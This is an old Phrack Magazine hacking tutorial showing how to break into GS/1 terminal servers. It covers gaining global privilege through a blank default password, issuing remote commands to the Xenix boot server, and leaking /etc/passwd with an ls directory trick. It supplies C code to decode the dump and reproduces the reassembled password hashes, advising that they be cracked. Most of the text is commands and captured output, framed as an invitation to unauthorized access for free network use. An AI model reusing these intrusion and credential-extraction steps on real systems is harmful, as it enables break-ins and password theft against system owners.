==Phrack Magazine==
Volume Five, Issue Forty-Six, File 17 of 28
****************************************************************************
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<> <>]
[<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
[<> <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<> <>]
[<> Brought to you by: <>]
[<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
[<> <>]
[<> Story line: Maldoror -n- [)r. [)elam <>]
[<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
[<> Unix Technical Expertise: Wunder-Boy [)elam <>]
[<> Sysco Technishun: Marvelous Maldoror <>]
[<> <>]
[<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
[<> Non-CoNForMisT products already on the market such as <>]
[<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
[<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
[<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
[<> identification program), and various other programs and <>]
[<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
[<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
[<> <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
Index
========================================
1. Finding and identifying a GS/1
2. Getting help
3. Gaining top privilege access
4. Finding the boot server
5. Connecting to the boot server
6. Getting the boot server password file
7. Other avenues
----------------------------------------------------------------------------
Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is
advisable to fill your stein with Sysco and pay close attention... if
Sysco is not available in your area, Hacker Pschorr beer will work
almost as good... (especially Oktoberfest variety)
What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a server, like a DEC or Xyplex.
So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
wasting the GS/1.. the French fone police will fly over to your country
and hunt you down like a wild pack of dogs, then hang you by your own
twisted pair.)
What to do:
-----------
+--------------------------------------+
+ #1. Finding and identifying a GS/1 +
+--------------------------------------+
Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be. A
few years ago there were quite a number of GS/1's laying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC's. (If you don't know what the hell I'm talking about, look at
some old Phracks and LOD tech. journals.)
The prompt will look similar to this:
(!2) GS/1>
(The (!2) refers to the port you are on)
+--------------------+
+ #2. Getting help +
+--------------------+
First try typing a '?' to display help items.
A help listing looks like this:
> (!2) GS/1>?
> Connect
[,] [ ECM ] [ Q ]
> DO
> Echo
> Listen
> Pause []
> PIng [ timeout ]
> SET = ...
> SHow ...
At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):
> (!2) GS/1# ?
> BRoadcast ( )
> Connect ( ) [,] [ ECM ] [ Q ]
> DEFine = ( )
> DisConnect ( ) []
> DO ( )
> Echo
> Listen ( )
> Pause []
> PIng [ timeout ]
> ReaD ( )
> REMOTE
> ROtary ( ) ! [+|-]= ![-!] , ...
> SAve ( )
> SET ( ) = ...
> SETDefault ( ) [ = ] ...
> SHow ( ) ...
> UNDefine ( )
> UNSave ( )
> ZeroMacros ( )
> ZeroStats ( )
Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.
If you need in-depth help for any of the commands, you can again use the
'?' in the following fashion:
> (!2) GS/1>sho ?
> SHow ADDRess
> SHow ClearingHouseNames [ [ @ [@ ] ] ]
> SHow DefaultParameters [ ...]
> SHow GLobalPARameters
> SHow NetMAP [ Short | Long ]
> SHow PARAmeterS [ ...]
> SHow ...
> SHow SESsions [ P ]
> SHow VERSion
> (!2) GS/1>sh add?
> SHow ADDRess
> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2
"sh add" displays your own network, address and port number.
The network is 000023B5
The address is 07000201E1D7
The port number is 2
+------------------------------------+
+ #3. Gaining top privilege access +
+------------------------------------+
Figure out the global password.
Do a "set priv=global" command.
Note:
----
There are 3 states to set priv to: user, local, and global. Global is
the state with the most privilege. When you attain global privilege,
your prompt will change to have a '#' sign at the end of it.. this means
you have top priceless (similar to *nix's super user prompt).
The GS/1 will prompt you for a password. The default password on GS/1's
is to have no password at all... The GS/1 will still prompt you for a
password, but you can enter anything at this point if the password was
never set.
+-------------------------------+
+ #4. Finding the boot server +
+-------------------------------+
Figure out the boot server address available from this GS/1 ..
The boot server is what lies under the GS/1. We've found that GS/1's are
actually run on a Xenix operating system.. (which is of course a nice
phamiliar territory) It's debatable whether all GS/1's are run on Xenix or
not as we have yet to contact the company. (We may put out a 2nd file going
into more detail.)
Do a "sh b" or "sh global" as shown in the following examples:
> (!2) GS/1# sh b
> BAud = 9600 BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
> BSDelay = None BUffersize = 82
> (!2) GS/1# sh global
> ...............................Global Parameters............................
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz" Organization = "delam0"
> PROmpt = "GS/1>" NMPrompt = "GS/1# "
> LocalPassWord = "" GlobalPassWord = "haque-me"
> NetMapBroadcast = ON MacType = EtherNET
> CONNectAudit = ON ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781
Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
... these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" matches any string). You'll only be able to
"sh global" after a successful "set priv=global".
Now that you have the boot server address, the next step is enabling
communication to the boot server.
+-------------------------------------+
+ #5. Connecting to the boot server +
+-------------------------------------+
Do a REMOTE where address is the address of the machine you
want to issue remote commands to.
> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
> BInd [-f ] [-l ] []
> BRoadcast ( ) ""
> CoPyfile [:] [:][]
> LiSt [ -ls1CR ] [ ...]
> MoVe
> NAme = [,]...
> Ping [timeout]
> ReMove ...
> SET [( )] = ...
> SETDefault = ...
> SHow
> UNBind
> UNDefine
> UNName
> ZeroStats
> (to leave remote mode)
Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE command.
Notice for this case, the boot server's address was used.
When you get the REMOTE: prompt, you can issue commands that will be
executed on the remote machine. Try doing a '?' to see if it's another
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).
> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
Look familiar?? If not, go to the nearest convenient store and buy the
a 12 pack of the cheapest beer you can find.. leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.
You're basically doing a Remote Procedure Call for ls to your Xenix boot
server.
Notice at this point that the "passwd" is not owned by root. This is
because this is not the system password file, and you are not in the
"/etc" directory... (yet)
There are a couple of problems:
> (!2) Remote: cat
> Invalid REMOTE command
>
> (!2) Remote: cd /etc
> Invalid REMOTE command
You cannot view files and you cannot change directories.
To solve the "cd" problem do the following:
> (!2) Remote: ls -l ..
> total 26
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
> -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
> -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
> -rw------- 1 root root 427 Aug 17 1989 .profile
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
> -r-------- 1 bin bin 25526 May 4 1989 boot
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
> -r-------- 1 bin bin 577 Nov 3 1987 dos
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
> drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
> drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
> -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
> -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
Your brain should now experience deja vous.. you just found the
root directory. (for the non-*nix, lam0-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
Now you can get to /etc/passwd as follows:
> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x 1 bin bin 7110 May 8 1989 accton
> -rwx------ 1 bin bin 1943 May 8 1989 asktime
> -rwx------ 1 bin bin 31756 May 8 1989 badtrk
> -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
> -rwx--x--x 1 bin bin 24726 May 8 1989 brand
> -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
> -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
> -rwx------ 1 bin bin 2857 May 8 1989 chsh
> -rwx------ 1 bin bin 7550 May 8 1989 clri
> -rwx------ 1 bin bin 8034 May 8 1989 cmos
> -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
> -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
> ...... etc.
> -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
Yeah, now what?!
You've found the /etc/passwd file, but you don't have "cat" to type the
file out. Now you're stuck... so drink a half a bottle of Sysco per
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
like us... make sure it's the big bottle kind not those girly small
onez.)
+---------------------------------------------+
+ #6. Getting the boot server password file +
+---------------------------------------------+
There is one way to get around the cat problem (no itz n0t puttin
catnip laced with somethin U made frum a phile on yer doorstep)
It's done using ls. On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.
Note about directory structure for the inquisitive hacker:
In a directory record there is a 14 byte string containing the file
name, and the 2 byte I-number (2 bytes = an integer in this case)
which is a number that is an (I)ndex pointer to the I-node. The
I-node then contains the information about where the file's data is
actually kept (similar to how a FAT table works on an IBM PC yet a
different concept as it has indirect index blocks etc. I won't get
into) and what permissions are set for the file. Be warned that in
newer *nix implementations, file names can be more than 14 characters
and the directory structure will be a bit different than discussed.
The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what's in the directory"... newer *nix
systems won't like this (the -f option) because of the new directory
structure.
> (!2) Remote: ls -?
> ls: illegal option --?
> usage: -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
> 22327 xcU:100:100:NC 8275 operator:/usr/
>
> (!2) Remote:
> (!2) GS/1#
Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.
The password file is almost legible, but the I-numbers still need to be
converted to ASCII characters. This can be accomplished in a variety of
ways... the easiest is to write a program like the following in C:
On a PC the following code should work:
#include
main()
{
union {
int i;
char c[2];
} x;
while (1) {
printf("Enter I-Number: ");
scanf("%d", &x.i);
printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
}
}
On a *nix based system the following code will work (depending on
word size and byte arrangement):
#include
main()
{
union {
short int i;
char c[2];
} x;
while (1) {
printf("Enter I-Number: ");
scanf("%hd", &x.i);
printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
}
}
When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):
28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/
29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy
26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information
12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin
29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL
18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
22327 xcU:100:100:NC 8275 operator:/usr/
22327 = [7][W] 8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr
The resulting file will look like the following:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
7WxcU:100:100:NCS operator:/usr
Because the ls command cannot display "non-printable" characters such
as the carriage return, it will replace them with a '?' character...
delete the '?' characters and divide by line at these locations. When
you finish doing that, you'll have a standard /etc/passwd file:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
Once you've assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs.
+---------------------+
+ #7: Other Avenues +
+---------------------+
Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:
>(!2) GS/1# sh att
> Attached Networks
>&000023B5
>(!2) GS/1# sh nmap l
> NETWORK &000023B5 MAP
>
> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
> .... etc.
The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS". Examining the rest of the
list, number 6 has the same description. System 12 may be just another
address for the boot server or it may be a different Xenix... but it should
be Xenix whatever it is.
We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.
This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.